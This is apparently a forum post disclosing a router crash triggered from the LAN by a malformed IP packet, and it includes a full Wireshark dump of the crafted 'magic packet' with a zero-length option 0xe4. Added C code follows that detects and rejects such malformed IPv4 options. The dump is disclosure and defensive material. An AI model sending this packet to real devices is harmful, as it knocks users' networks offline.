I still haven't tested the device from the WAN-side.
The packet does not crash the router if it is addressed to the router. To crash the router (from the LAN-side, anyway), it must be addressed to an external (WAN-side) IP address.
example:
router is 192.168.1.1
evil_pc is 192.168.1.101 (evil_pc is a PC attached to one of the ethernet ports on the router.)
evil_pc sends the magic packet to ANY external IP address, for example, www.google.com. The router will then crash, and need to be rebooted.
magic packet:
No. Time Source Destination Protocol Info
11576 989.558120 192.168.1.101 67.8.x.x IP Unknown (0xaa)
Frame 11576 (58 bytes on wire, 58 bytes captured)
Ethernet II, Src: 3com_cc:57:86 (00:10:5a:cc:57:86), Dst: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
Destination: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
Source: 3com_cc:57:86 (00:10:5a:cc:57:86)
Type: IP (0x0800)
Internet Protocol, Src: 192.168.1.101 (192.168.1.101), Dst: 67.8.x.x (67.8.x.x)
Version: 4
Header length: 24 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
Total Length: 44
Identification: 0x04d2 (1234)
Flags: 0x00
Fragment offset: 0
Time to live: 255
Protocol: Unknown (0xaa)
Header checksum: 0x062a [correct]
Source: 192.168.1.101 (192.168.1.101)
Destination: 67.8.x.x (67.8.x.x)
Options: (4 bytes)
Unknown (0xe4) (with too-short option length = 0 bytes)
Data (20 bytes)
0000 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 ABCDEFGHIJKLMNOP
0010 52 53 54 55 RSTU
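Wireshark marks the IP option in the capture above as having a too-short option length (0 bytes). One way a packet filter or IDS could reject such headers before they reach a forwarding path, as an added example that is not part of the original post and not the router's code. The function and constant names are hypothetical, and the sample headers are constructed from the fields in the dump, with a documentation destination address, a zeroed checksum, and assumed zero padding after the option.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Result codes (hypothetical names, not taken from any real IP stack). */
enum opt_status { OPT_OK = 0, OPT_BAD_HEADER = -1, OPT_BAD_LENGTH = -2 };

/* Walk the IPv4 options area and reject any multi-byte option whose length
 * octet is below 2 (type + length) or runs past the end of the header. */
int check_ipv4_options(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return OPT_BAD_HEADER;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;   /* header length in bytes */
    if (ihl < 20 || ihl > len)
        return OPT_BAD_HEADER;
    size_t i = 20;                              /* options start after fixed header */
    while (i < ihl) {
        uint8_t type = pkt[i];
        if (type == 0) break;                   /* End of Option List */
        if (type == 1) { i++; continue; }       /* No-Operation, single octet */
        if (i + 1 >= ihl)                       /* no room for the length octet */
            return OPT_BAD_LENGTH;
        uint8_t olen = pkt[i + 1];
        if (olen < 2 || i + olen > ihl)         /* length 0 or 1 never advances */
            return OPT_BAD_LENGTH;
        i += olen;
    }
    return OPT_OK;
}

/* Constructed sample: IHL 6, total length 44, ID 0x04d2, TTL 255, protocol
 * 0xaa, option 0xe4 with length 0. Destination is 192.0.2.1 (placeholder). */
static const uint8_t sample_bad[24] = {
    0x46, 0x00, 0x00, 0x2c, 0x04, 0xd2, 0x00, 0x00,
    0xff, 0xaa, 0x00, 0x00, 192, 168, 1, 101,
    192, 0, 2, 1, 0xe4, 0x00, 0x00, 0x00
};
/* Constructed control: same header, option length set to a valid 4 bytes. */
static const uint8_t sample_ok[24] = {
    0x46, 0x00, 0x00, 0x2c, 0x04, 0xd2, 0x00, 0x00,
    0xff, 0xaa, 0x00, 0x00, 192, 168, 1, 101,
    192, 0, 2, 1, 0xe4, 0x04, 0x00, 0x00
};

int main(void) {
    printf("bad=%d ok=%d\n", check_ipv4_options(sample_bad, sizeof sample_bad),
           check_ipv4_options(sample_ok, sizeof sample_ok));
    return 0;
}
```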